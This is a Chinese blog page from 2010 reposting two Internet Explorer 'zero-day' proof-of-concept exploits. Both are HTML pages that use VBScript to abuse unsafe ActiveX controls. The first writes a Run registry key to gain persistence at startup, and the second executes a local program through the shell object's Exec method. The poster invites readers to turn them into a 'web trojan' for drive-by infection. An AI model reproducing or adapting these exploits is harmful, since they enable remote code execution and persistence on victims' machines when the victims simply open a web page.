浏览模式: 标准 | 列表Tag:ie
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法))
Submitted by admin
2010, January 24, 2:10 PM
来源:坏人咖啡的窝
这个代码会写入启动项,各位看官测试的时候注意了,不会当时生效,重启后可见效果!
测试代码:
<html>
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>
<script language='vbscript'>
targetFile = "c:\WINDOWS\system32\wshom.ocx"
prototype = "Sub RegWrite ( ByVal Name As String , ByRef Value As Variant , [ ByRef Type As Variant ] )"
memberName = "RegWrite"
progid = "IWshRuntimeLibrary.IWshShell_Class"
argCount = 3
D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
germaya_x="C:\WINDOWS\system32\calc.exe"
his0k4="REG_SZ"
target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4
</script>又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行)
Submitted by admin
2010, January 24, 2:08 PM
来源:坏人咖啡的窝
这段代码在SP3+IE6下测试成功
测试代码:
<html>
<p align="left"><b><font face="Segoe Script" size="7">
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>
<script language='vbscript'>
arg1="c:\WINDOWS\system32\calc.exe"
target.Exec arg1
</script></p>
有兴趣的同学可以回去搞一下,弄个网马出来!
-----------------------
代码保存为html格式的,本地运行了下,还能跳出计算器,很强大,我的补丁都打了。。。
